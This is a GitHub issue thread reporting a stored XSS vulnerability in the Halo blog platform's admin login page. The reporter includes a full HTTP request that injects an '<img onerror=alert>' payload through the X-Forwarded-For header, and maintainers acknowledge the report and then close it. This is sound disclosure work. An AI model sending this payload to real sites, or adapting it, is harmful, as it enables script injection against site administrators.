### ISSUE TITLE
These is A stored xss vulnerability

### ISSUE THREAD

**Issue by Artemis1029** [halo-dev/halo#126]
**我确定我已经查看了** (标注`[ ]`为`[x]`)

- [x] [Halo 使用文档](https://docs.halo.run/)
- [x] [Github Wiki 常见问题](https://github.com/ruibaby/halo/wiki/4.-%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98)
- [x] [其他 Issues](https://github.com/ruibaby/halo/issues)

----

**我要申请**  (标注`[ ]`为`[x]`)

- [x] BUG 反馈
- [ ] 添加新的特性或者功能
- [ ] 请求技术支持
## Bug Report
In [issue 9](https://github.com/halo-dev/halo/issues/9), someone reported two storage XSS, and you have fixed, but the Second XSS. But it still has another output point `X-Forwarded-For`
payload HTTP Requests
```http
POST /admin/getLogin HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.47 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Referer:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 56
Connection: close
Cookie: JSESSIONID=
X-Forwarded-For: 127.<img src=1 onerror=alert(123)>0.0.2

loginName=asas&loginPwd=asas
```
<img width="1096" alt="图片" src="https://user-images.githubusercontent.com/26483211/55526171-98e26d00-56c6-11e9-90dc-6dbe81885d3a.png">
<img width="1351" alt="图片" src="https://user-images.githubusercontent.com/26483211/55526211-b7486880-56c6-11e9-9024-2d4271807af7.png">

**Comment by ruibaby** [comment]
@Artemis1029 好的,我们会尽快处理该问题,非常感谢你的反馈.

**Comment by ruibaby** [comment]
准备发布 v1，所以关闭该 issue。
